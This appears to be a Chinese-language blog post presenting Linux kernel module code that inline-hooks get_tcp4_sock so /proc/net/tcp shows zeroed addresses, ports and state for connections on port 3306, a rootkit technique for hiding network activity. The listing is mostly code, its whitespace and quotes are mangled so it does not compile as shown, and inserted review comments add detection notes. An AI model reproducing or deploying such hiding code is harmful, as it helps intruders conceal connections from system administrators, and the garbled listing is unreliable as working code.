Linux下隐藏网络连接的另一种方法

直接 inline hook 住 get_tcp4_sock 这个函数就行了,只不过需要重新实现一下 get_tcp4_sock 的功能,再做一下过滤。比较简单,代码如下:

#include<linux/kernel.h>

#include<linux/init.h>

#include<linux/module.h>

#include<linux/version.h>

#include<linux/types.h>

#include<linux/string.h>

#include<linux/unistd.h>

#include<linux/fs.h>

#include<linux/kmod.h>

#include<linux/file.h>

#include<linux/sched.h>

#include<linux/mm.h>

#include<linux/slab.h>

#include<linux/spinlock.h>

#include<linux/socket.h>

#include<linux/net.h>

#include<linux/in.h>

#include<linux/skbuff.h>

#include<linux/ip.h>

#include<linux/tcp.h>

#include<net/sock.h>

#include<asm/uaccess.h>

#include<asm/unistd.h>

#include<asm/termbits.h>

#include<asm/ioctls.h>

#include<linux/icmp.h>

#include<linux/netdevice.h>

#include<linux/netfilter.h>

#include<linux/netfilter_ipv4.h>

/* Module metadata: licence string and author name for the loadable kernel module. */
/* NOTE(review): the quote characters below are typographic, apparently from
 * page extraction; a C compiler needs ASCII double quotes here. Within this
 * listing there is no module init/exit routine and no hook-installation code. */
MODULE_LICENSE(“GPL”);

MODULE_AUTHOR(“wzt”);

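/**
 * wnps_in_aton - parse a dotted-quad IPv4 string into a network-order address.
 * @str: NUL-terminated text such as "127.0.0.1"; must not be NULL.
 *
 * Reads up to four '.'-separated decimal fields and packs them, most
 * significant first, into a 32-bit value. Missing fields count as 0, and
 * anything after the fourth field is ignored, as in the original listing.
 *
 * Unlike the original, a field containing a non-digit character or a value
 * above 255 is rejected instead of being folded into neighbouring octets.
 *
 * Return: the address in network byte order, or 0xFFFFFFFF when a field is
 * malformed (the same value "255.255.255.255" parses to, as with inet_addr()).
 */
__u32 wnps_in_aton(const char *str)
{
	unsigned long addr = 0;
	int i;

	for (i = 0; i < 4; i++) {
		unsigned int octet = 0;

		addr <<= 8;
		if (*str == '\0')
			continue;	/* string exhausted: remaining octets stay 0 */

		while (*str != '\0' && *str != '.') {
			if (*str < '0' || *str > '9')
				return 0xFFFFFFFFu;
			octet = octet * 10 + (unsigned int)(*str - '0');
			/* Checked per digit so octet can never overflow. */
			if (octet > 255)
				return 0xFFFFFFFFu;
			str++;
		}
		addr |= octet;

		/* Step over the '.' separator, if there is one. */
		if (*str != '\0')
			str++;
	}

	return htonl((__u32)addr);
}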

/*
 * new_get_tcp4_sock - replacement row formatter for one TCP socket.
 *
 * Writes a single formatted line describing sk into the seq_file f. Per the
 * page's introduction it is meant to stand in for the kernel's
 * get_tcp4_sock (the routine that formats rows of /proc/net/tcp) through an
 * inline hook; the hook installation is not part of this listing.
 *
 * sk:  socket being reported.
 * f:   seq_file that receives the formatted row.
 * i:   slot number printed as the first column in the unfiltered branch.
 * len: passed as the argument of the trailing %n conversion.
 *
 * Behaviour visible here: when the local or remote port equals 3306 the
 * slot, address, port and state columns are written as zeros; every other
 * column is still written with the socket's real values.
 *
 * NOTE(review): the listing lost its token-separating whitespace, the
 * spaces inside the format strings and its ASCII quotes during extraction,
 * so it does not compile as shown. The inet_sock field names used
 * (daddr, rcv_saddr, dport, sport) presumably tie it to an older kernel
 * release - confirm against the targeted version.
 *
 * Detection notes for reviewers:
 *  - both printk calls write to the kernel log on every invocation or match,
 *    so the log carries the module's marker strings;
 *  - the filtered socket is not dropped: a row is still emitted with all-zero
 *    slot/address/port/state columns, and its uid and inode columns
 *    (sock_i_uid, sock_i_ino) are real, so it can be correlated with the
 *    socket inodes listed under a process's fd directory;
 *  - only this seq_file formatter is altered by the code shown; socket
 *    listings obtained through other kernel interfaces are not touched here
 *    and can be compared against it.
 */
voidnew_get_tcp4_sock(structsock*sk,structseq_file*f,inti,int*len)

{

inttimer_active;

unsignedlongtimer_expires;

structtcp_sock*tp=tcp_sk(sk);

conststructinet_connection_sock*icsk=inet_csk(sk);

structinet_sock*inet=inet_sk(sk);

/* Addresses are kept as stored in the socket; ports are converted to host order. */
__be32dest=inet->daddr;

__be32src=inet->rcv_saddr;

__u16destp=ntohs(inet->dport);

__u16srcp=ntohs(inet->sport);

/* Debug trace emitted for every socket row that is formatted. */
printk(“!!innew_get_tcp4_sock.\n”);

/* Pick the timer code (1, 4, 2 or 0) and expiry that the row reports:
 * retransmit timer, zero-window probe timer, sk_timer, or none. */
if(icsk->icsk_pending==ICSK_TIME_RETRANS){

timer_active=1;

timer_expires=icsk->icsk_timeout;

}elseif(icsk->icsk_pending==ICSK_TIME_PROBE0){

timer_active=4;

timer_expires=icsk->icsk_timeout;

}elseif(timer_pending(&sk->sk_timer)){

timer_active=2;

timer_expires=sk->sk_timer.expires;

}else{

/* No timer pending: expiry equals jiffies, so the printed delta is 0. */
timer_active=0;

timer_expires=jiffies;

}

/*

if(src==wnps_in_aton(“127.0.0.1”)){

printk(“got127.0.0.1”);

return;

}

*/

/* Filter: either endpoint using port 3306 selects the masked row below. */
if(srcp==3306||destp==3306){

printk(“got3306!\n”);

/* Same format string as the else branch, but the first six arguments
 * (slot, local addr, local port, remote addr, remote port, state) are
 * literal zeros. */
seq_printf(f,”%4d:%08X:%04X%08X:%04X%02X%08X:%08X%02X:%08lX”

“%08X%5d%8d%lu%d%p%lu%lu%u%u%d%n”,

0,0,0,0,0,0,

tp->write_seq-tp->snd_una,

sk->sk_state==TCP_LISTEN?sk->sk_ack_backlog:

(tp->rcv_nxt-tp->copied_seq),

timer_active,

jiffies_to_clock_t(timer_expires-jiffies),

icsk->icsk_retransmits,

/* uid and inode are still the socket's real values in the masked row. */
sock_i_uid(sk),

icsk->icsk_probes_out,

sock_i_ino(sk),

/* The socket pointer itself is printed through %p. */
atomic_read(&sk->sk_refcnt),sk,

jiffies_to_clock_t(icsk->icsk_rto),

jiffies_to_clock_t(icsk->icsk_ack.ato),

(icsk->icsk_ack.quick<<1)|icsk->icsk_ack.pingpong,

tp->snd_cwnd,

tp->snd_ssthresh>=0xFFFF?-1:tp->snd_ssthresh,

len);

}

else{

/* Unfiltered socket: the row carries the real slot, addresses, ports and state. */
seq_printf(f,”%4d:%08X:%04X%08X:%04X%02X%08X:%08X%02X:%08lX”

“%08X%5d%8d%lu%d%p%lu%lu%u%u%d%n”,

i,src,srcp,dest,destp,sk->sk_state,

tp->write_seq-tp->snd_una,

/* Listening sockets report the accept backlog; others report unread bytes. */
sk->sk_state==TCP_LISTEN?sk->sk_ack_backlog:

(tp->rcv_nxt-tp->copied_seq),

timer_active,

jiffies_to_clock_t(timer_expires-jiffies),

icsk->icsk_retransmits,

sock_i_uid(sk),

icsk->icsk_probes_out,

sock_i_ino(sk),

atomic_read(&sk->sk_refcnt),sk,

jiffies_to_clock_t(icsk->icsk_rto),

jiffies_to_clock_t(icsk->icsk_ack.ato),

(icsk->icsk_ack.quick<<1)|icsk->icsk_ack.pingpong,

tp->snd_cwnd,

/* A slow-start threshold of 0xFFFF or more is printed as -1. */
tp->snd_ssthresh>=0xFFFF?-1:tp->snd_ssthresh,

len);

}

}
